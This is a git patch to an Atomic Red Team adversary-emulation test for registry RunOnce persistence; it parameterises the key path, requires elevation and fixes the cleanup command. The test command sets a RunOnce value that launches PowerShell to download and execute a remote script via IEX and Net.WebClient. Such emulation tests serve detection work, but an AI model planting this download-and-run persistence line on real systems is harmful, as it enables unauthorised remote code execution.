From aae45a1937a2fc577d8bd4711a5eeba216e09738 Mon Sep 17 00:00:00 2001
From: dwhite9 <daniel.shane.white@gmail.com>
Date: Mon, 2 Mar 2020 14:31:26 -0600
Subject: [PATCH] fixed RunOnce cleanup command by adding extra input argument
 for reg (#852)

key.

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1060/T1060.yaml | 9 +++++++--
 1 file changed, 7 insertions(+), 2 deletions(-)

diff --git a/atomics/T1060/T1060.yaml b/atomics/T1060/T1060.yaml
index 3c740b16..3723d405 100644
--- a/atomics/T1060/T1060.yaml
+++ b/atomics/T1060/T1060.yaml
@@ -47,10 +47,15 @@ atomic_tests:
       description: Thing to Run
       type: Path
       default: powershell.exe
+    reg_key_path:
+      description: Path to registry key to update
+      type: Path
+      default: HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce
   executor:
     name: powershell
+    elevation_required: true
     command: |
-      $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
+      $RunOnceKey = "#{reg_key_path}"
       set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
     cleanup_command: |
-      Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force -ErrorAction Ignore
+      Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore